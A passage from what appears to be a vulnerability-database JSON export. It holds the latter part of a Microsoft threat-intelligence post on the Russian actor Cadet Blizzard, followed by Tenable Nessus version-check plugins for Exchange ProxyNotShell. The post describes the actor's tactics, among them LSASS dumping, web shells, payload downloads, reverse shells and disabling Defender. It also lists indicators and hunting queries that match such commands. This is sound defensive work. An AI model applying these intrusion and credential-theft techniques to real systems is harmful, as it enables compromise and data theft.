later.\n\nCadet Blizzard compromises and maintains a foothold on affected networks for months, often exfiltrating data prior to disruptive actions. Microsoft observed Cadet Blizzard\u2019s activity peak between January and June 2022, followed by an extended period of reduced activity. The group re-emerged in January 2023 with increased operations against multiple entities in Ukraine and in Europe, including another round of website defacements and a new \u201cFree Civilian\u201d Telegram channel affiliated with the hack-and-leak front under the same name that first emerged in January 2022, around the same time as the initial defacements. Cadet Blizzard actors are active seven days of the week and have conducted their operations during their primary European targets\u2019 off-business hours. Microsoft assesses that NATO member states involved in providing military aid to Ukraine are at greater risk.\n\nFigure 1. A heatmap of the operational cadence of Cadet Blizzard\n\nCadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion. While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard. Additionally, as is the case with other Russian state-sponsored threat groups, Microsoft assesses that at least one Russian private sector organization has materially supported Cadet Blizzard by providing operational support including during the WhisperGate destructive attack.\n\n### Targets\n\nCadet Blizzard\u2019s operations are global in scope but consistently affect regional hotspots in Ukraine, Europe, Central Asia, and, periodically, Latin America. Cadet Blizzard likely prioritizes target networks based on requirements consistent with Russian military or intelligence objectives such as geolocation or perceived impact. Cadet Blizzard, consistent with a Russian military-associated threat actor, continues to mainly target Ukraine, although the relative scope of impact of Cadet Blizzard\u2019s destructive activity is minimal compared to the multiple waves of destructive attacks that we attribute to Seashell Blizzard. In January 2022, Cadet Blizzard launched destructive attacks in Ukraine in the following industry verticals:\n\n * Government services\n * Law enforcement\n * Non-profit/non-governmental organization\n * IT service providers/consulting\n * Emergency services\n\nCadet Blizzard has repeatedly targeted information technology providers and software developers that provide services to government organizations using a supply chain \u201ccompromise one, compromise many\u201d technique. The group\u2019s January 2022 compromise of government entities in Ukraine probably were at least in part due to access and information gained during a breach of an information technology provider that often worked with these organizations.\n\nPrior to the war in Ukraine, Cadet Blizzard performed historical compromises of several Eastern European entities as well, primarily affecting the government and technology sectors as early as April 2021. As the war continues, Cadet Blizzard activity poses an increasing risk to the broader European community, specifically any successful attacks against governments and IT service providers, which may give the actor both tactical and strategic-level insight into Western operations and policy surrounding the conflict. Gaining heightened levels of access into these targeted sectors may also enable Cadet Blizzard to carry out retaliatory demonstrations in opposition to the West\u2019s support for Ukraine.\n\n### Tools, tactics, and procedures\n\nCadet Blizzard is a conventional network operator and commonly utilizes living-off-the-land techniques after gaining initial access to move laterally through the network, collect credentials and other information, and deploy defense evasion techniques and persistence mechanisms. Unlike other Russian-affiliated groups that historically prefer to remain undetected to perform espionage, the result of at least some notable Cadet Blizzard operations are extremely disruptive and are almost certainly intended to be public signals to their targets to achieve the larger objective of destruction, disruption, and possibly, intimidation.\n\nFigure 2. Cadet Blizzard's normal operational lifecycle\n\n**Initial access**\n\nCadet Blizzard predominantly achieves initial access through exploitation of web servers commonly found on network perimeters and DMZs. Cadet Blizzard is also known for exploiting Confluence servers through the CVE-2021-26084 vulnerability, Exchange servers through multiple vulnerabilities including CVE-2022-41040 and ProxyShell, and likely commodity vulnerabilities in various open-source platforms such as content management systems.\n\n**Persistence**\n\nCadet Blizzard frequently persists on target networks through the deployment of commodity web shells used either for commanding or tunneling. Commonly utilized web shells include [P0wnyshell](<https://github.com/flozz/p0wny-shell>), [reGeorg](<https://github.com/sensepost/reGeorg>), PAS, and even custom variants included in publicly available exploit kits.\n\nIn February 2023, [CERT-UA reported](<https://cert.gov.ua/article/3947787>) an attempted attack against a Ukrainian state information system that involved a variant of the PAS web shell, which Microsoft assesses to be unique to Cadet Blizzard operations at the time of the intrusion.\n\n**Privilege escalation and credential harvesting** \nCadet Blizzard has leveraged a variety of living-off-the-land techniques to conduct privilege escalation and harvesting of credentials.\n\n * Dumping LSASS \u2013 Cadet Blizzard uses Sysinternals tools such as _procdump_ to dump LSASS in suspected offline credential harvesting efforts. Cadet Blizzard frequently renames _procdump64_ to alternative names, such as _dump64.exe_.\n * Dumping registry hives \u2013 Cadet Blizzard extracts registry hives using native means via _reg save_.\n\n**Lateral movement** \nCadet Blizzard conducts lateral movement with valid network credentials obtained from credential harvesting. To conduct lateral movement more efficiently, Cadet Blizzard typically uses modules from the publicly available [Impacket framework](<https://github.com/fortra/impacket>). While this framework is generically utilized by multiple actors, preferential execution of patterns of commands may allow for more precision profiling of Cadet Blizzard operations:\n\n * PowerShell _get-volume_ to enumerate the volume of a device\nFigure 3. PowerShell _get-volume_ command\n\n * Copying critical registry hives that contain password hashes and computer information\nFigure 4. Copying critical registry hives\n\n * Downloading files directly from actor-owned infrastructure via the PowerShell _DownloadFile_ commandlet\nFigure 5. PowerShell _DownloadFile_ commandlet\n\n**Command execution and C2**\n\nCadet Blizzard periodically uses generic socket-based tunneling utilities to facilitate command and control (C2) to actor-controlled infrastructure. Payloads such as NetCat and Go Simple Tunnel (GOST) are commonly renamed to blend into the operating system but are used to shovel interactive command prompts over established sockets. Frequently, remote command execution may be facilitated through remotely scheduled tasks. The group has also sparingly utilized Meterpreter.\n\nFigure 6. Scheduled task creating a reverse shell\n\n**Operational security**\n\nCadet Blizzard utilizes anonymization services IVPN, SurfShark, and Tor as their anonymization layer during select operations.\n\n**Anti-forensics** \nCadet Blizzard has been observed leveraging the _Win32_NTEventlogFile_ commandlet in PowerShell to extract both system and security event logs to an operational directory. The activities are anticipated to be consistent with anti-forensics activities.\n\n * Common file targets during extraction are:\n * _sec.evtx_\n * _sys.evtx_\n * Cadet Blizzard commonly deletes files used during operational phases seen in lateral movement.\n * Cadet Blizzard malware implants are known to disable Microsoft Defender Antivirus through a variety of means:\n * _NirSoft AdvancedRun_ utility, which is used to disable Microsoft Defender Antivirus by stopping the _WinDefend_ service.\n * _Disable Windows Defender.bat,_ which presumably disables Microsoft Defender Antivirus via the registry.\nFigure 7. Addition of registry key to disable Microsoft Defender Antivirus\n\n**Impact assessment**\n\nCadet Blizzard typically collects information en-masse from targeted servers. If mail servers are affected, Cadet Blizzard typically attempts to collect mail, placing incident response communications at risk. Credential material (such as SSH keys) are also a common target to provide methods for re-entry if a full remediation does not occur. As was the case with the WhisperGate operation in January 2022, Cadet Blizzard is known to deploy destructive malware to select target environments to delete data and render systems inoperable.\n\nAlso in January of 2022, Microsoft identified that data exfiltrated by Cadet Blizzard in compromises of various Ukrainian organizations was leaked on a Tor .onion site under the name \u201cFree Civilian.\u201d The organizations from which data was leaked strongly correlated to multiple Cadet Blizzard compromises earlier in 2022, leading Microsoft to assess that this forum is almost certainly linked to Cadet Blizzard. In February 2023, a new Telegram channel was established under the same \u201cFree Civilian\u201d moniker, suggesting that Cadet Blizzard intends to continue conducting information operations in the second year of the war. However, the public channel only has 1.3K followers with posts getting at most a dozen reactions as of the time of publication, signifying low user interaction. A private channel assumed to be operated by the same group appears to have shared data with 748 of those subscribers.\n\nFigure 8. Free Civilian hack-and-leak front\n\n### Related ecosystems\n\nCadet Blizzard operations do not occur in a silo; there have been substantial technical indicators of intersection with other malicious cyber activity that may have a broader scope or a nexus outside of Russia. They have at times utilized services associated with these ecosystems such as Storm-0587, discussed below, as well as having support from at least one private sector enabler organization within Russia. Though there have been various forms of intersections in threat activity, when these groups have been observed operating independently, the tactics, techniques, procedures (TTPs) and capabilities have often been distinct\u2014therefore making it operationally valuable to distinguish these activity groups.\n\n**Storm-0587**\n\nStorm-0587 is a cluster of activity beginning as early as April 2021 involving a series of weaponized documents predominantly delivered in phishing operations usually to distribute a series of downloaders and [document stealers](<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>). One of Storm-0587's trademark tools is [SaintBot](<https://www.malwarebytes.com/blog/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader>), an uncommon downloader that often appears in spear-phishing emails. This downloader can be customized to deploy almost anything as the payload, but in Ukraine, the malware often deploys a version of an [AutoIT information stealer](<https://gist.github.com/malwarezone/119bed274bc77b52122fa118f0a72618#file-stealer-au3-L2880>) that collects documents on the machine that threat actors deem of interest. This specific version of the malware has been named [OUTSTEEL by CERT UA](<https://cert.gov.ua/article/18419>) and has been observed in several attacks, such as a fake version of the Office of the President of Ukraine\u2019s website created in July 2021 that hid weaponized documents, including OUTSTEEL, that would download onto victim\u2019s machines when the documents are clicked.\n\n## Mitigation and protection guidance\n\n### Defending against Cadet Blizzard\n\nActivities linked to Cadet Blizzard indicate that they are comprehensive in their approach and have demonstrated an ability to hold networks at risk of continued compromise for an extended period of time. A comprehensive approach to incident response may be required in order to fully remediate from Cadet Blizzard operations. Organizations can bolster security of information assets and expedite incident response by focusing on areas of risk based on actor tradecraft enumerated within this report. Use the included indicators of compromise to investigate environments and assess for potential intrusion.\n\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Enable [controlled folder access (CFA)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/controlled-folders>) to prevent MBR/VBR modification.\n * [Block process creations originating from PSExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-process-creations-originating-from-psexec-and-wmi-commands>) to stop lateral movement utilizing the WMIexec component of Impacket.\n * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus, turned on by default in Windows, or the equivalent for your chosen antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n\n### Hunting for Cadet Blizzard hands-on-keyboard activity\n\nTo uncover malicious hands-on-keyboard activities in environments, identify any unusual or unexpected commands or tools launched on systems as well as the presence of any unusual directories or files that could be used for staging or storing malicious tools. Use the common commands, tools, staging directories, and indicators of compromise listed below to help identify Cadet Blizzard intrusion and hands-on-keyboard activity in environments.\n\n**Common commands**\n\n * _systeminfo_ to fingerprint a device after lateral movement\n * _get-volume_ to fingerprint a device after lateral movement\n * _nslookup_ to research specific devices (IP) and FQDNs internally\n * _Get-DnsServerResourceRecord_ to conduct reconnaissance of an internal DNS namespace\n * _query session_ to profile RDP connections\n * _route print_ to enumerate routes available on the devices\n * _DownloadFile_ via PowerShell to download payloads from external servers\n\n**Common tool staging directories**\n\n * _C:\\ProgramData_\n * _C:\\PerfLogs_\n * _C:\\Temp_\n * _C:\\_\n * Subdirectories of legitimate (or fake) user accounts within _%APPDATA%\\Temp_\n * Subdirectories with the name _USOPublic _in the path\n\n**Common tools**\n\n * Tor\n * Python\n * SurfShark\n * Teamviewer\n * Meterpreter named as _dbus-rpc.exe_ in known instances\n * IVPN\n * NGROK\n * _GOST.exe_ frequently masked as _USORead.exe_****\n * regeorg web shell\n\n**Indicators of compromise (IOCs)**\n\nIOC| Type| Description \n---|---|--- \njusticeua[.]org| Domain| Sender for non-weaponized emails containing only antagonistic messaging: _volodimir_azov@justiceua[.]org_ \n179.43.187[.]33| IP address| Hosted the JusticeUA operation between March and April 2022 \n3a2a2de20daa74d8f6921230416ed4e6| PE Import Hash| PE Import Hash matching WhisperGate malware \n3e4bb8089657fef9b8e84d9e17fd0d7740853c4c0487081dacc4f22359bade5c| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n20215acd064c02e5aa6ae3996b53f5313c3f13625a63da1d3795c992ea730191| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n3fe9214b33ead5c7d1f80af469593638b9e1e5f5730a7d3ba2f96b6b555514d4| SHA-256| Web shell - WSO Shell (not unique to Cadet Blizzard) \n23d6611a730bed886cc3b4ce6780a7b5439b01ddf6706ba120ed3ebeb3b1c478| SHA-256| Web shell \u2013 reGeorg (not unique to Cadet Blizzard) \n7fedaf0dec060e40cbdf4ec6d0fbfc427593ad5503ad0abaf6b943405863c897| SHA-256| Web shell \u2013 PAS (may not be unique to Cadet Blizzard) \n \n### Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects behavioral components of techniques this threat actor uses as the following:\n\n * Behavior:Win32/WmiprvseRemoteProc\n\nMicrosoft Defender Antivirus detects the WhisperGate malware attributed to this threat actor with the following family:\n\n * WhisperGate\n\n**Microsoft Defender for Endpoint**\n\nThe following Microsoft Defender for Endpoint alerts can indicate associated threat activity:\n\n * Cadet Blizzard activity detected\n * Possible Storm-0587 activity detected\n\nThe following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.\n\n * Ongoing hands-on-keyboard attack via Impacket toolkit\n * Suspicious PowerShell command line\n * Suspicious WMI process creation\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-26084\n * CVE-2020-1472\n * CVE-2021-4034\n\n### Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks:\n\nCheck for WMIExec Impacket activity with common Cadet Blizzard commands\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"WmiPrvSE.exe\" and FileName =~ \"cmd.exe\"\n | where ProcessCommandLine matches regex \"2>&1\"\n | where ProcessCommandLine has_any (\"get-volume\",\"systeminfo\",\"reg.exe\",\"downloadfile\",\"nslookup\",\"query session\",\"route print\")\n \n\nFind PowerShell file downloads\n \n \n DeviceProcessEvents\n | where FileName == \"powershell.exe\" and ProcessCommandLine has \"DownloadFile\"\n \n\nScheduled task creation, command execution and C2 communication\n \n \n DeviceProcessEvents \n | where Timestamp > ago(14d) \n | where FileName =~ \"schtasks.exe\" \n | where (ProcessCommandLine contains \"splservice\" or ProcessCommandLine contains \"spl32\") and \n (ProcessCommandLine contains \"127.0.0.1\" or ProcessCommandLine contains \"2>&1\")\n \n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u201cTI map\u201d) to automatically match indicators associated with Cadet Blizzard in Microsoft Defender Threat Intelligence (MDTI) with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the MDTI connector and analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>.\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list above.\n\n * [Web Shell Activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web Shells Threat Protection/Hunting Queries/WebShellActivity.yaml>)\n * [Commands executed by WMI](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows Security Events/Hunting Queries/CommandsexecutedbyWMIonnewhosts-potentialImpacket.yaml>)\n * [Potential Impacket Execution](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker Tools Threat Protection Essentials/Hunting Queries/PotentialImpacketExecution.yaml>)\n * [Dumping LSASS using procdump](<https://github.com/Azure/Azure-Sentinel/blob/ccbb0e644810e0edf3b8ee4f284fd05ea1cc46ad/Hunting%20Queries/Microsoft%20365%20Defender/Credential%20Access/procdump-lsass-credentials.yaml>)\n * [Potential Microsoft Defender Tampering](<https://github.com/Azure/Azure-Sentinel/blob/c5e3281a8a30ea658ce8f8234a182a63ceb996d7/Hunting%20Queries/Microsoft%20365%20Defender/Defense%20evasion/PotentialMicrosoftDefenderTampering%5BSolarigate%5D.yaml>)\n\n### References\n\n * <https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>\n * <https://github.com/flozz/p0wny-shell>\n * <https://github.com/sensepost/reGeorg>\n * <https://cert.gov.ua/article/3947787>\n * <https://github.com/fortra/impacket>\n * <https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>\n\n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>.\n\nThe post [Cadet Blizzard emerges as a novel and distinct Russian threat actor](<https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-06-14T16:00:00", "type": "mssecure", "title": "Cadet Blizzard emerges as a novel and distinct Russian threat actor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-26084", "CVE-2021-4034", "CVE-2022-41040"], "modified": "2023-06-14T16:00:00", "id": "MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "href": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-09-16T12:46:11", "description": "The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day vulnerabilities, dubbed ProxyNotShell:\n\n - An unspecified authenticated server-side request forgery (SSRF) vulnerability. (CVE-2022-41040)\n\n - An unspecified authenticated remote code execution (RCE) vulnerability when PowerShell is accessible to the attacker. (CVE-2022-41082)\n\nPlease refer to Microsoft for guidance on mitigations for these vulnerabilities.", "cvss3": {}, "published": "2022-10-05T00:00:00", "type": "nessus", "title": "Microsoft Exchange Server October 2022 Zero-day Vulnerabilities (ProxyNotShell)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-01-12T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS22_OCT_EXCHANGE_ZERODAY.NASL", "href": "https://www.tenable.com/plugins/nessus/165705", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc. \n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(165705);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2022-41040\", \"CVE-2022-41082\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/21\");\n script_xref(name:\"IAVA\", value:\"2022-A-0474-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0031\");\n\n script_name(english:\"Microsoft Exchange Server October 2022 Zero-day Vulnerabilities (ProxyNotShell)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day\nvulnerabilities, dubbed ProxyNotShell:\n\n - An unspecified authenticated server-side request forgery (SSRF) vulnerability. (CVE-2022-41040)\n\n - An unspecified authenticated remote code execution (RCE) vulnerability when PowerShell is accessible to the\n attacker. (CVE-2022-41082)\n\nPlease refer to Microsoft for guidance on mitigations for these vulnerabilities.\");\n # https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57fc3035\");\n # https://www.tenable.com/blog/cve-2022-41040-and-cve-2022-41082-proxyshell-variant-exploited-in-the-wild\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7cacb5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.tenable.com/s/feed/0D53a00008oIvkYCAS\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact Microsoft for patching guidance.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyNotShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'cu': 23,\n 'unsupported_cu': 22,\n 'fixed_version': '15.0.1497.42.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2016',\n 'cu': 22,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2375.32.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product': '2016',\n 'cu': 23,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2507.13.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2019',\n 'cu': 11,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.986.36',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2019',\n 'cu': 12,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.1118.15.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-16T12:46:10", "description": "This plugin detects the potential presence of a web shell in selected directories and this can be indicative that the host might have been exploited with CVE-2022-41040 / CVE-2022-41082. It is recommended that the results are manually verified and appropriate remediation actions taken.\n\nNote that Nessus has not tested for this issue but has instead looked for files that could potentially indicate compromise.", "cvss3": {}, "published": "2022-10-03T00:00:00", "type": "nessus", "title": "Potential exposure to Microsoft Exchange CVE-2022-41040 / CVE-2022-41082 Exploit", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "EXCHANGE_CVE-2022-41040_IOC.NBIN", "href": "https://www.tenable.com/plugins/nessus/165629", "sourceData": "Binary data exchange_cve-2022-41040_ioc.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-16T16:00:35", "description": "The Microsoft Exchange Server installed on the remote host is missing a security update. It is, therefore, affected by multiple vulnerabilities as referenced in the Nov, 2022 security bulletin.\n\n - Microsoft Exchange Server Spoofing Vulnerability (CVE-2022-41078, CVE-2022-41079)\n\n - Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2022-41040, CVE-2022-41080, CVE-2022-41123)\n\n - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2022-41082)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-11T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Exchange Server (Nov 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41078", "CVE-2022-41079", "CVE-2022-41080", "CVE-2022-41082", "CVE-2022-41123"], "modified": "2023-01-12T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS22_NOV_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/167281", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167281);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\n \"CVE-2022-41040\",\n \"CVE-2022-41078\",\n \"CVE-2022-41079\",\n \"CVE-2022-41080\",\n \"CVE-2022-41082\",\n \"CVE-2022-41123\"\n );\n script_xref(name:\"MSFT\", value:\"MS22-5019758\");\n script_xref(name:\"MSKB\", value:\"5019758\");\n script_xref(name:\"IAVA\", value:\"2022-A-0474-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/01/31\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0031\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (Nov 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host is missing a security update. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the Nov, 2022 security bulletin.\n\n - Microsoft Exchange Server Spoofing Vulnerability (CVE-2022-41078, CVE-2022-41079)\n\n - Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2022-41040, CVE-2022-41080, \n CVE-2022-41123)\n\n - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2022-41082)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5019758\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5019758\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyNotShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'cu': 23,\n 'unsupported_cu': 22,\n 'fixed_version': '15.0.1497.44',\n 'kb': '5019076'\n },\n {\n 'product' : '2016',\n 'cu': 22,\n 